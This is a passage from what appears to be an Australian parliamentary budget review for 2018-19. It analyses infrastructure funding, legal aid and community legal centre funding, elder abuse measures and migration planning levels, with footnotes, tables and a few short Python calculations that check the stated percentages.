Over the period from 2014-15 to 2017-18 the payments total $29.5 billion, and over the period from 2018-19 to 2021-22 the expected payments total $24.3 billion, for a total of $53.8 billion.250.251 This reduction appears to be what Infrastructure Partnerships Australia are referring to in their commentary noted above, and highlighted by the Opposition spokesperson in media commentary.252
249. Some minor one-off payments such as ‘Supplementary funding to South Australia for local roads’ are excluded. This measure accounts for $40 million over 2017-18 and 2018-19.
250. Assuming the estimated actual figure is representative of the actual expenditure in the year prior to a Budget year, based on Australian Government, Federal financial relations: budget paper no.3, for the years 2013-14 until 2018-19, typically Table 2.9.
251. Australian Government, Federal financial relations: budget paper no.3: 2018-19, Table 2.9, p. 45.
252. A Albanese (Shadow Minister for Infrastructure, Transport, Cities and Regional Development), Transcript of television interview: Sky News with Samantha Maiden: 10 May 2018: by-elections, Mayo preselection, citizenship, single parent families, boat turnbacks, ALP National Conference, media release, 10 May 2018.
Figure 1: Infrastructure payments to other levels of Government
There is no obvious explanation for the reduction in funding, with almost all components of the three program groups outlined above declining.
Funding mechanisms
Over time, new funding mechanisms have been used by the Commonwealth to support infrastructure projects, beyond traditional transfers to the states.253 These mechanisms include:
• Equity investments: akin to buying shares in a business, the use of which provides direct control over a project’s delivery and financing risks, and allows for potential future returns from profitable investments. For example, the 2017-18 Budget included an equity commitment of $8.4 billion in the Australian Rail Track Corporation Pty Ltd to deliver inland rail.254
• Concessional loans: which provide a financing option to projects based on a lower interest rate or longer time frame than might be available in private markets. For example, the 2017-18 Budget discussed a $2 billion concessional loan for the WestConnex project.255
• Guarantees: where the Commonwealth accepts responsibility for defined risk events that would provide an incentive for private investors to invest. For example, the 2018-19 Budget outlines an indemnity given to the Moorebank Intermodal Company Limited (MIC) ‘…to cover all costs and liabilities that may be incurred by MIC in the event that the Commonwealth terminates the Equity Funding Agreement between the Commonwealth and MIC’.256
• Creating funding pools: attributing a pool of resources that can be drawn upon for a range of related purposes. For example, the 2017-18 Budget outlined the $5 billion Northern Australia Infrastructure Facility.257
It is also feasible that some major projects could receive support by a combination of these mechanisms in hybrid form to manage more complex risks and financing requirements.
The use of these mechanisms introduces comparability and counting challenges.
253. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 4, p. 4-13.
254. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 4, p. 4-9.
255. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 3, p. 3-13.
256. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 9, pp. 9-15.
257. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 3, p. 3-13.
Projects in the total count
The Parliamentary Library has not been able to identify project commitments in the Budget documents that equal the Government’s $75 billion total. The various documents published by the Government and the Department of Infrastructure, Regional Development and Cities provide only partial information:
• Budget Paper No. 2, Part 2: Expense Measures identifies $116 million in infrastructure spending in 2018-19, with an additional $246 million over the forward estimates.260 Budget Paper No. 3, Table 2.9 identifies $6.3 billion in infrastructure payments to the states in 2018-19, with an additional $15.1 billion over the forward estimates.261
• A Budget press release from the Minister for Infrastructure and Transport identifies $5.0 billion in Commonwealth spending in 2018-19 on projects with a total Commonwealth contribution of $35.4 billion.262 This list excludes a number of programs, such as the Black Spot Projects, Bridges Renewal Program, and Roads to Recovery, as well as projects funded through equity (such as Snowy Hydro and Western Sydney Airport) and special funds (such as the Northern Australia Infrastructure Facility and the National Water Infrastructure Lending Facility). Projects which do not receive funding in 2018-19 are also excluded.
• A list of current major projects from the Department identifies $9.7 billion in Commonwealth spending from 2018-19 onwards, with a total contribution of $29.7 billion.263 A number of initiatives are excluded, including projects which do not receive funding in 2018-19.
• A 10 Year Infrastructure Investment Pipeline list from the Department identifies $24.6 billion of Commonwealth spending.264 It appears that this list includes funding provided in the 2018-19 Budget and is not completely additional to the list of major projects already underway. As funding detail is not provided, it is not possible to determine how these lists interact or the total amount of infrastructure investment.
258. P Fletcher (Minister for Urban Infrastructure) and D Chester (Minister for Infrastructure and Transport), 2017-18 Budget papers reveal record spending on infrastructure, media release, 11 May 2017.
259. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 9, pp. 9-8 and 9-33 to 9-34.
260. Australian Government, Budget measures: budget paper no. 2: 2018-19, Part 2, pp. 136-149.
261. Australian Government, Federal financial relations: budget paper no. 3: 2018-19, Part 2, p. 45.
262. M McCormack (Deputy Prime Minister and Minister for Infrastructure and Transport), 2018-19 Budget-Infrastructure: busting congestion, connecting our regions, improving safety and creating jobs, ministerial budget statement, 2018.
263. Australian Government, Strengthening Australia’s cities and regions, p. 32.
264. Australian Government, Strengthening Australia’s cities and regions, p. 4.
The Parliamentary Library has been unable to locate any public document which provides a transparent overview of total infrastructure commitments. This difficulty is not new. In the 2017-18 Federal Budget the Treasurer claimed $75 billion in infrastructure spending over 10 years.265 The Parliamentary Library was unable to corroborate this figure and the Department later identified $78.7 billion in infrastructure spending over 10 years in Senate Estimates.266 The Department may again provide new information about infrastructure spending commitments in Estimates hearings on the 2018-19 Budget.
A summary of the different presentations of total infrastructure expenditure reported outside of the Budget documents is in Annex A.
Concluding comments.’267 This appears to remain the case in 2018-19, with spending split between traditional payments to the states, various new financing mechanisms and the use of contingent commitments that do not attach to actual payments.
265. S Morrison (Treasurer), Budget Speech 2017-18.
266. Senate Rural and Regional Affairs and Transport Legislation Committee, Answers to Questions on Notice, Infrastructure and Regional Development Portfolio, Budget Estimates 2017-18, Question 26, accessed 16 May 2018.
267. Infrastructure Australia, Australian Infrastructure Plan, 2016, p. 23.
ANNEX A: References to infrastructure expenditure in related documents
(all figures in $m)

Reference | Source | No timeframe | 2013-14 to 2021-22 | 2018-19 | 2018-19 onwards | 2018-19 to 2026-27
10 Year Infrastructure Pipeline | a | — | — | — | — | 24 582.6
Map of Pipeline projects | b | 24 181.6 | — | — | — | —
Current Major Projects | c | 29 727.7* | — | — | 9 744.6 | —
Budget 2018-19: Key Projects** | d | — | 35 425.6 | 5 035.17 | — | —
Busting Congestion. Connecting our regions. Improving Safety*** | e | 56 999 | — | — | — | —
Legal aid and legal assistance services Michele Brennan and Jaan Murphy
Legal aid services: Commonwealth funded legal services are delivered by state and territory legal aid commissions through the National Partnership Agreement on Legal Assistance Services (NPALAS) and the Expensive Commonwealth Criminal Cases Fund (ECCCF).
Legal assistance services: all of the sector-wide legal service providers, including legal aid commissions, community legal centres (CLCs), Aboriginal and Torres Strait Islander legal services (ATSILS) and family violence prevention legal services.
Commonwealth funding for legal assistance services Most of the funding provided by the Australian Government to support the delivery of legal assistance services to disadvantaged Australians is provided through the National Partnership Agreement on Legal Assistance Services (NPALAS). The current NPALAS commenced on 1 July 2015 and expires on 30 June 2020.268 Unlike its predecessor, which only covered legal aid services, the current NPALAS also provides funding for community legal centres (CLCs).269
In 2018-19 the Australian Government will provide $265.9 million in funding for legal aid services and CLCs through the NPALAS.270 This is an increase of $4.4 million from 2017-18. Funding will then increase by $4.1 million in 2019-20 to $270 million. The forward estimates only indicate funding to 2019-20 as the NPALAS is due to expire on 30 June 2020.271
This funding is consistent with the 2017-18 Budget, but reflects an increase on the funding in the NPALAS as originally agreed. This is discussed below.
The allocation of this funding between legal aid commissions and CLCs is shown below.
Legal aid funding
Funding is provided to legal aid commissions through two main sources—the NPALAS (through which funding is provided to states and territories) and the Expensive Commonwealth Criminal Cases Fund (ECCCF), which is administered by the Attorney-General’s Department (AGD).
Figure 1 shows payments to states and territories for legal aid commissions between 1995-96 and 2019-2020.272 From 2015-16 the funding reflects the current NPALAS.
268. Council of Australian Governments (COAG), National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017.
269. J Murphy and M Brennan, ‘Legal aid and legal assistance services’, Budget review 2016-17, Research paper series, 2015-16, Parliamentary Library, Canberra, 2016, p. 75; COAG, National Partnership Agreement on Legal Assistance Services, [2010].
270. Australian Government, Federal financial relations: budget paper no. 3: 2018-19, pp. 64, 66.
271. COAG, National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017, clause 7.
272. For consistency, figures for 1994-1995 to 2007-2008 were drawn from the relevant portfolio budget statements: see, for example, Australian Government, Portfolio budget statements 1995-1996: budget related paper no. 4.1: Attorney-General's Portfolio, p. 75. The figures for 2008-09 to 2014-15 were drawn from the respective Final Budget Outcome papers: see, for example, Australian Government, Final budget outcome 2014-2015, 2015, p. 77. Figures from 2015-16 to 2020-21 were drawn from COAG, National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017, pp. 10-12 and calculated on the basis of the funding allocated for legal aid commissions only. Other sources provide figures that can differ substantially, see: J Murphy, ‘Legal aid and legal assistance services’, Budget review 2013-14, Research paper, 3, 2012-13, Parliamentary Library, Canberra, May 2013, p. 61.
Budget Review 2018-19 58
Figure 1: payments for the provision of legal aid services to states and territories
ECCCF funding
Funding for legal aid commissions is also provided through the ECCCF.273 ECCCF funding will be stable over the forward estimates period and from 2017-18 represents a return to levels similar to that provided prior to the 2011-12 Budget revisions (as discussed in Budget Review 2014-15).274 Table 1 shows ECCCF funding over the forward estimates.275
Table 1: Expensive Commonwealth Criminal Cases Fund amounts
(all figures in $’000)

Expensive Commonwealth Criminal Cases Fund | 2016-17 Budget | 2017-18 Budget | 2018-19 Budget | 2019-20 Forward estimate | 2020-21 Forward estimate | 2021-22 Forward estimate
2016-17 Budget | 4 610 | 3 682 | 3 733 | 3 784 | — | —
2017-18 Budget | 4 610* | 3 675 | 3 722 | 3 769 | 3 799 | —
2018-19 Budget | — | 3 675* | 3 722 | 3 765 | 3 799 | 3 852
Change: 2017-18 to 2018-19 | N/A | 0 | 0 | -4 | 0 | N/A

*Estimated actual from relevant Portfolio budget statements.
Source: as per footnote 8.
273. Attorney-General’s Department (AGD), ‘Expensive Commonwealth Criminal Cases Fund’, AGD website. Under the ECCCF, the AGD has discretion to provide additional funding to legal aid commissions for specific, complicated Commonwealth criminal cases, such as drug importation or criminal conspiracy cases.
274. J Murphy, ‘Legal aid and legal assistance services’, Budget review 2014-15, Research paper series, 2013-14, Parliamentary Library, Canberra, 2014, pp. 115-116. For a discussion of the 2014-15 budget measure ‘Legal aid—withdrawal of additional funding’ see: J Murphy, ‘Legal aid and legal assistance services’, op. cit., p. 115; Australian Government, Portfolio budget statements 2016-17: budget related paper no. 1.2: Attorney-General's Portfolio, p. 19; Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio, p. 19; Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, p. 17.
275..
Community legal centre funding
The Australian Government provides funding for CLCs through the NPALAS and the ‘Justice Services’ program in the AGD.
As discussed above, the current NPALAS includes funding for CLCs. This means that from 2015-16 the majority of funding for CLCs will be provided through the NPALAS. Prior to this, the majority of CLC funding was provided through the AGD.276
Under the NPALAS as originally agreed, over the three years 2017-18 to 2019-20, CLC funding would have been $30.6 million less than if funding was maintained at 2016-17 Budget levels.277 On 24 April 2017, the Government announced an additional $39 million for CLCs to be delivered through the NPALAS.278 This additional funding was reflected in the 2017-18 Budget and may be regarded as largely representing a reversal of the forecast $30.6 million reduction, with a modest additional increase of $8.4 million over three years (around 5.8 per cent of total NPALAS CLC funding over that period).279
AGD ‘Justice Services’ funding
Due to the redirection of CLC funding through the NPALAS, the amount of CLC funding delivered by the AGD has decreased. The forecast CLC funding provided through the AGD over the forward estimates shown in the 2018-19 Budget is consistent with the figures forecast in the 2017-18 Budget, as Table 2 below demonstrates.280 This year’s forecast shows CLC funding provided through the AGD decreasing by 71 per cent ($7.2 million) between 2018-19 and 2019-20, and then stabilising over the remainder of the forward estimates.281 This funding decrease appears to be related to the changed focus of the AGD’s Community Legal Services Programme from providing funding for delivery of legal services to a discretionary grant program, which will fund ‘national service delivery projects, innovative pilot programmes and programme support activities’ to enhance the provision of legal assistance to the community.282
276. Australian Government, Portfolio budget statements 2015-16: budget related paper no. 1.2: Attorney-General's Portfolio, pp. 19, 30.
277. COAG, National Partnership Agreement on Legal Assistance Services, [2016], as originally agreed, pp. 10-11.
278. G Brandis (Attorney-General), M Cash (Minister for Women) and N Scullion (Minister for Indigenous Affairs), Record federal funding for legal assistance, media release, 24 April 2017. See also: Murphy and Brennan, ‘Legal aid and legal assistance services’, op. cit., for more details about CLC funding under the NPALAS.
279. For details about the forecast CLC funding cuts see: Murphy and Brennan, ‘Legal aid and legal assistance services’, op. cit., pp. 76-77.
280..
281. Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 17.
282. AGD, ‘Community Legal Services Programme’, AGD website. For further information see: AGD, Programme guidelines for Community Legal Services Programme, 2015.
Table 2: funding for CLCs provided through the AGD
(all figures in $’000)

                               2016-17  2017-18  2018-19  2019-20  2020-21  2021-22
                               Budget   Budget   Budget   Forward  Forward  Forward
                                                          estimate estimate estimate
Community legal services
  2016-17 Budget                7 906    7 704    2 627    2 661      —        —
  2017-18 Budget                8 016*   8 989   10 185    2 991    3 179      —
  2018-19 Budget                   —     8 989*  10 185    2 988    3 179    3 223
  Change: 2017-18 to 2018-19       —        0        0       -3        0      N/A

*Estimated actual from relevant Portfolio budget statements.
Source: as per footnote 13.
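The 71 per cent decrease noted above can be reproduced from the 2018-19 Budget row of Table 2. A quick check, assuming the Table 2 figures (in $'000) as given:

```python
# AGD-delivered CLC funding, 2018-19 Budget row of Table 2 ($'000).
clc_2018_19 = 10_185
clc_2019_20 = 2_988
drop = clc_2018_19 - clc_2019_20           # 7 197 ($'000)
print(round(drop / 1000, 1))               # 7.2 ($ million)
print(round(drop / clc_2018_19 * 100))     # 71 (per cent)
```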
Total CLC funding
The figure below shows Commonwealth recurrent spending on CLCs from 2005-06 to 2019-20.283 The figures from 2015-16 onwards include funding provided through the AGD and funding provided under the NPALAS.284
Indigenous legal assistance services
As noted in Budget Review 2014-15, changes to some Indigenous program names, their transfer to the Department of the Prime Minister and Cabinet, subsequent consolidation, and the lack of detail in relevant portfolio budget papers make assessing long-term funding trends difficult.285
283. The forward estimates do not include figures for 2020-21, reflecting the expiry of the NPALAS on 30 June 2020.
284. For consistency, figures for 2005-06 to 2015-16 were drawn from the respective final budget outcome papers. See, for example: Australian Government, Final budget outcome 2014-15, September 2015, p. 77. Figures from 2016-17 to 2019-20 were drawn from COAG, National Partnership Agreement on Legal Assistance Services, [2016], as varied 28 June 2017, pp. 10-12 and the relevant portfolio budget papers, and calculated by combining the spending on CLCs contained in the NPALAS and portfolio budget papers. See, for example, Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 17.
285. Murphy, ‘Legal aid and legal assistance services’, Budget review 2014-15, op. cit., p. 116 and sources cited therein.
The funding commitments for the Indigenous Legal Assistance Program (ILAP, previously named the Indigenous Legal Aid Policy Reform Program)286 are detailed in the following table:
Table 3: funding commitments for the Indigenous Legal Assistance Program
(all figures in $’000)

                               2016-17  2017-18  2018-19  2019-20  2020-21  2021-22
                               Budget   Budget   Budget   Forward  Forward  Forward
                                                          estimate estimate estimate
Indigenous Legal Assistance Program
  2016-17 Budget               73 585   69 099   68 992   69 890      —        —
  2017-18 Budget               73 585*  74 463   74 365   75 276   70 173      —
  2018-19 Budget                   —    74 463*  74 365   75 202   70 173   71 155
  Change: 2017-18 to 2018-19     N/A        0        0      -74        0      N/A

* Estimated actual from relevant portfolio budget statements.287
Source: as per footnote 19.
The funding for the Indigenous Legal Assistance Program in the 2018-19 Budget is largely consistent with the funding indicated in the 2017-18 Budget.288
The estimated amount spent on the ILAP in 2013-14 was $74.9 million.289 Using that figure as a benchmark, the 2016-17 Budget indicated that funding for the ILAP would be 1.8 per cent ($1.3 million) less in 2016-17; 7.8 per cent ($5.8 million) less in 2017-18; eight per cent ($5.9 million) less in 2018-19 and 6.7 per cent ($5 million) less in 2019-20.290 Over the period 2017-18 to 2019-20, this would have been a cut of $16.7 million—the same amount of additional funding for Aboriginal and Torres Strait Islander Legal Services announced by the Government in April 2017 and reflected in the 2017-18 and 2018-19 budget papers.291
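The cuts described in this paragraph can be reproduced from the 2016-17 Budget figures in Table 3 and the $74.9 million 2013-14 benchmark. A sketch, using only figures quoted above (all in $ million):

```python
# ILAP funding in the 2016-17 Budget, against the 2013-14 benchmark.
benchmark = 74.9  # estimated ILAP spend in 2013-14 ($m)
ilap = {"2016-17": 73.585, "2017-18": 69.099,
        "2018-19": 68.992, "2019-20": 69.890}

cuts = {year: round(benchmark - amount, 1) for year, amount in ilap.items()}
print(cuts)
# {'2016-17': 1.3, '2017-18': 5.8, '2018-19': 5.9, '2019-20': 5.0}

# Total cut over 2017-18 to 2019-20 — the $16.7m later restored.
total = sum(benchmark - ilap[y] for y in ("2017-18", "2018-19", "2019-20"))
print(round(total, 1))  # 16.7
```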
Domestic violence services
This year’s budget contains no additional funding for domestic violence services. However, as part of the Women’s Safety Package, last year’s (2017-18) Budget included $3.4 million in funding over two years to expand the trial of Domestic Violence Units (DVUs) in legal centres around Australia.292 The DVUs will provide legal and other assistance (such as financial counselling, tenancy assistance, trauma counselling, emergency accommodation, family law services and employment services) to women who are experiencing, or at risk of, domestic or family violence. The location of the DVUs was announced in October 2017, in high-need areas in each state and the Northern Territory.293
286. Murphy, ‘Legal aid and legal assistance services’, Budget review 2015-16, Research paper series, 2014-15, Parliamentary Library, Canberra, 2015, p. 106 and sources cited therein.
287. Portfolio budget statements 2016-17: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20; Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20; Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 19.
288. Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20; Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 19.
289. Australian Government, Portfolio budget statements 2014-15: budget related paper no. 1.2: Attorney-General's Portfolio, 2014, p. 32; Murphy, ‘Legal aid and legal assistance services’, op. cit., p. 106 and sources cited therein.
290. Australian Government, Portfolio budget statements 2016-17: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20.
291. Brandis et al., Record federal funding for legal assistance, op. cit.; Portfolio budget statements 2017-18: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 20; Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General's Portfolio, op. cit., p. 19.
292. Australian Government, Budget measures: budget paper no. 2: 2017-18, p. 71.
293. G Brandis (Attorney-General), Turnbull Government funds new domestic violence units, media release, 16 October 2017.
Reaction from stakeholders
The Law Council of Australia (LCA) has called for a ‘significant boost in federal funding for legal aid’ as it regards the legal assistance sector as ‘critically underfunded’.294 LCA President Morry Bailes said:
Through the Law Council’s Justice Project, we estimate that an additional $390m per annum is required to get the legal assistance system back on its feet. This includes $200m as recommended by the Productivity Commission for civil legal assistance alone.295

The preventative, everyday role of timely legal assistance stops simple problems from escalating into more serious matters at great cost to the taxpayer and community. It’s time this was recognised and funded adequately.296
The National Association of Community Legal Centres expressed disappointment that the Budget did not provide additional core funding for legal services and felt that the Budget was ‘a missed opportunity to provide funding certainty ahead of expiration of National Partnership Agreement on Legal Assistance Services in 2020’.297
The National Aboriginal and Torres Strait Islander Legal Services (NATSILS) considers that the budget will ‘create more legal need for Aboriginal and Torres Strait Islander people’ by failing to address recommendations of the Australian Law Reform Commission and the Royal Commission into the Protection and Detention of Children in the Northern Territory aimed at addressing the over-representation of Indigenous people in custody.298 NATSILS is disappointed that the budget did not provide additional support for Indigenous legal services.299
294. Law Council of Australia, Budget boost to counter elder abuse welcome, but greater funding required to end justice crisis, media release, 8 May 2018.
295. For further information see: Productivity Commission (PC), Access to justice arrangements, Inquiry report, 72, PC, Canberra, 5 September 2014.
296. Law Council of Australia, Budget boost to counter elder abuse welcome, but greater funding required to end justice crisis, op. cit.
297. National Association of Community Legal Centres, A missed opportunity to guarantee essential services, media release, n.d.
298. For further information see: Australian Law Reform Commission (ALRC), Pathways to justice: an inquiry into the incarceration rate of Aboriginal and Torres Strait Islander peoples, Final report, 133, ALRC, Sydney, December 2017 and Royal Commission into the Protection and Detention of Children in the Northern Territory, Report of the Royal Commission and Board of Inquiry into the Protection and Detention of Children in the Northern Territory, The Commission, Canberra, November 2017.
299. National Aboriginal and Torres Strait Islander Legal Services, Federal Budget measures will create more legal need for Aboriginal and Torres Strait Islander people but no solutions, media release, 9 May 2018.
Responding to elder abuse
Kaushik Ramesh
More Choices for a Longer Life—protecting older Australians
The Budget contains a range of measures under the umbrella of the ‘More Choices for a Longer Life’ package aimed at ‘maximis[ing] the opportunities that a longer life brings’.300 The package recognises:
Australians are now expected to live almost 10 years longer than they were 50 years ago, with our life expectancy now fifth highest in the OECD. This is a remarkable achievement. To make the most of the opportunities a longer life provides, Australians need to prepare early to be healthy, independent, connected and safe.301
As part of this suite of measures, the Government has committed $22.0 million over five years from 2017-18 to respond to elder abuse and protect the rights of older Australians. This element of the package comes within the responsibility of the Attorney-General’s portfolio.302
The total proposed expenditure on the measure is set out in Table 1.
Table 1: Expense measure: More Choices for a Longer Life - protecting older Australians

Expense ($m)     2017-18  2018-19  2019-20  2020-21  2021-22
Administered        -       2.5      5.2      5.3      5.3
Departmental      -6.0      0.5      3.1      3.1      3.1
Total             -6.0      3.0      8.2      8.3      8.4

Source: Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.2: Attorney-General’s Portfolio, p. 13.
Elder Abuse Report
The ‘More Choices for a Longer Life - protecting older Australians’ measure responds to the Australian Law Reform Commission’s (ALRC) report Elder Abuse - A National Legal Response (Elder Abuse Report).303 The terms of reference for the inquiry provided by then Attorney-General Senator Brandis asked the ALRC to consider:
• existing Commonwealth laws and legal frameworks which protect elder persons from abuse by carers, supporters and representatives, including regulation of financial institutions, superannuation, social security, health and living and care arrangements and
• the interaction and relationship of relevant Commonwealth laws with state and territory laws.304
The Elder Abuse Report made 43 recommendations aimed at safeguarding ‘older people from abuse and support[ing] their choices and wishes’.305 These recommendations included:
• developing, in conjunction with the states and territories, a National Plan to combat elder abuse that will promote the autonomy of older people, address ageism, achieve national consistency and safeguard at-risk adults306
300. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, p. 1-24.
301. Australian Government, More Choices for a Longer Life, Budget 2018 fact sheet, 2018.
302. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 76.
303. Budget paper no. 1, op. cit., p. 1-26; Australian Law Reform Commission (ALRC), Elder abuse - a national legal response: final report, 131, ALRC, Sydney, May 2017.
304. Ibid., p. 5.
305. Ibid., p. 28.
• conducting a national prevalence study of elder abuse to build an evidence base ahead of formulating policy307
• establishing a national online register of enduring documents, and court and tribunal appointments of guardians and financial administrators308 and
• developing national, best practice guidelines for legal practitioners in relation to the preparation and execution of wills to cover matters such as elder abuse.309
Policies under the ‘More Choices for a Longer Life - protecting older Australians’ measure
The $22.0 million funding provided to the Attorney-General’s Department will support:
• expansion and evaluation of support service trials such as:
  - specialist elder abuse units in legal services
  - health-justice partnerships and
  - family counselling and mediation services
• an Elder Abuse Knowledge Hub
• a National Prevalence Research scoping study and
• development of a National Plan to address elder abuse.310
The funding provided in the 2018-19 Budget builds on $15 million committed by the Government in the 2016-17 MYEFO in fulfilment of a 2016 election commitment.311
Elder Abuse Knowledge Hub and National Prevalence Research scoping study
The proposed Elder Abuse Knowledge Hub will be ‘an online gateway raising awareness and providing information and training materials for the public and professionals about preventing and responding to elder abuse’.312 The National Prevalence Research scoping study, being conducted by the Australian Institute of Family Studies (AIFS), seeks to ‘better understand the nature, scale and scope’ of elder abuse in Australia.313
National Plan to address elder abuse
On 20 February 2018, the Attorney-General, Christian Porter, announced that a National Plan would be developed in conjunction with state and territory Attorneys-General.314 Mr Porter stated that, in line with the recommendations of the Elder Abuse Report, the National Plan will have five goals:
• promoting the autonomy and agency of older people
• addressing ageism and promoting community understanding of elder abuse
• achieving national consistency
• safeguarding at-risk older people and improving responses
306. Ibid., p. 9.
307. Ibid.
308. Ibid., p. 12.
309. Ibid., p. 14.
310. Budget paper no. 2, op. cit., pp. 76-77.
311. Australian Government, Mid-year economic and fiscal outlook 2016-17, p. 136; Budget paper no. 2, op. cit., p. 77; Liberal Party of Australia, Election 2016: Protecting the rights of older Australians, Coalition policy document, Election 2016.
312. G Brandis (Attorney-General), International Day of Older Persons - supporting older Australians, media release, 1 October 2017; see also Liberal Party of Australia, Election 2016: Protecting the rights of older Australians, op. cit.
313. Ibid.
314. C Porter (Attorney-General), National plan to address elder abuse, media release, 20 February 2018.
• building the evidence base.315
Mr Porter also noted that the study conducted by the AIFS would provide the evidence base to ensure that the National Plan provides appropriate frameworks and strategies to respond to elder abuse.316
Support services
Health-justice partnerships317 are being trialled or developed in a number of places around Australia, including through Townsville Community Legal Services and Townsville Hospital, and in Caulfield and Footscray in Victoria.318
National Register for Enduring Powers of Attorney
The Budget papers advise that the Government ‘will work with the states and territories to develop a nationally consistent legal framework and establish a National Register of Enduring Powers of Attorney’.319 The expenditure required for this process has been accounted for in the Budget, but has not been published as the outcome of negotiations with the states and territories is still pending.320

The commitment to create this register responds to the Elder Abuse Report’s recommendation.321 The ALRC accepted that abuse of enduring documents was occurring and that ‘the extent of the powers granted by enduring documents means that any abuse is often relatively serious in its financial impact’.322 Accordingly, the ALRC recommended a register where only one enduring document of a particular type (financial or personal) could be registered at a time, so that documents are properly revoked and revoked instruments cannot be used.323
Stakeholder reaction
The Law Council of Australia (LCA) welcomed the budget measure, commenting that it had ‘long urged’ the Government to develop a National Plan and a National Prevalence study on elder abuse.324
National Seniors Australia welcomed the ‘commitment to tackling the issue of elder abuse’, but stated that it ‘will be looking for ongoing funding from the Federal Government for specialist elder abuse support services beyond the trial period’.325
COTA Australia stated:
We welcome additional funds for elder abuse initiatives and the Federal Government taking leadership in the development of a national framework and approach, including a national register of enduring powers of attorney.326
315. Ibid.
316. Ibid.
317. ALRC, Elder abuse, op. cit., p. 337.
318. Ibid., p. 339.
319. Budget paper no. 2, op. cit., p. 77.
320. Ibid.
321. ALRC, Elder abuse, op. cit., p. 12.
322. Ibid., pp. 181-182.
323. Ibid., p. 182.
324. Law Council of Australia, Budget boost to counter elder abuse welcome, but greater funding required to end justice crisis, media release, 8 May 2018.
325. National Seniors Australia (NSA), ‘The highs and lows of the "Baby Boomer budget"’, NSA website.
Immigration
Henry Sherrell
Permanent migration
Planning levels
Recent public and political debate about the appropriate size of Australia’s migration intake has renewed interest in migration policy. Each year in the budget, the Australian Government establishes a planning level outlining how many permanent residency visas to grant. These visas are allocated to the Migration Program (for skilled and family visas) and the Humanitarian Program.327 This is the Australian Government’s key policy lever to influence the rate of immigration to Australia.
In 2018-19, the planning figure for the Migration Program remains unchanged at 190,000 visas, marking the seventh consecutive year this figure has been used.328 This was announced in the Regional Australia ministerial budget statement, unlike in past years where the figure was in the Department of Home Affairs Portfolio Budget Statement. This continues the highest planning level on record.329
While the headline planning figure has not changed since 2012-13, a number of recent policy decisions are changing the composition and actual size of the Migration Program. The planning level itself has changed from a target to a ceiling, as noted in Minister Dutton’s media release for the 2017-18 Budget.330 In 2016-17, for the first time, there was a large discrepancy between the planning level and the number of permanent residency visas granted.331 Similar discrepancies may arise in 2017-18 and across the forward estimates period.
A new visa category for New Zealand citizens, announced in February 2016, will see additional long-term Australian residents on temporary visas transition to permanent residency.332 These people will be counted within the 190,000 visa planning level. The Department of Home Affairs has confirmed over 10,000 visa applications have been submitted under the New Zealand pathway in 2017-18, meaning a greater share of visas in the Migration Program will now be allocated to people already in Australia.333 This will change the composition of who receives a permanent visa, with fewer people who live overseas directly gaining a permanent visa. Further, broad policy change to temporary skilled worker visas has resulted in a sharp drop in new visa applications.334 Over the forward estimates period, both of these policy decisions will place downward pressure on the rate of net overseas migration.
326. COTA Australia, Federal Budget 2018 - welcome commitment to better planning for an ageing population and aged care, media release, 8 May 2018.
327. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget measures: budget paper no. 2: 2018-19.
328. M McCormack (Deputy Prime Minister) and J McVeigh (Minister for Regional Development, Territories and Local Government), Regional Australia - a stronger economy delivering stronger regions 2018-19, ministerial budget statement, 2018, p. 115.
329. J Phillips and J Simon-Davies, Migration to Australia: a quick guide to the statistics, Research paper series, 2016-17, Parliamentary Library, Canberra, 2017.
330. P Dutton (Minister for Immigration and Border Protection), 2017 Budget - immigration and border protection, media release, 9 May 2017.
331. 183,608 permanent visas were granted in 2016-17 for a planning level of 190,000. See H Sherrell, ‘Behind the numbers - the 2016-17 Migration Programme’, FlagPost, Parliamentary Library blog, 24 November 2017.
332. Department of Home Affairs, ‘An additional pathway to permanent residency for New Zealand citizens’, Fact sheet and Frequently asked questions, Department of Home Affairs website.
333. Department of Home Affairs, correspondence with the Parliamentary Library, April 2018.
334. H Sherrell, ‘Assessing the effect of recent 457 visa policy changes’, FlagPost, Parliamentary Library blog, 12 January 2018.
The planning level for the 2018-19 Humanitarian Program will increase to 18,750 places, up from 16,250 in 2017-18. This was announced and funded in the 2015-16 Budget.335 This will be the second largest Humanitarian Program since the Hawke Government.336 The Department of Home Affairs Portfolio Budget Statement also introduces the word ‘ceiling’ for the Humanitarian Program.337 This was previously not the case. In addition, the number of places in the Humanitarian Program is not stated, whereas it was in previous Portfolio Budget Statements.338
Retirement category visas
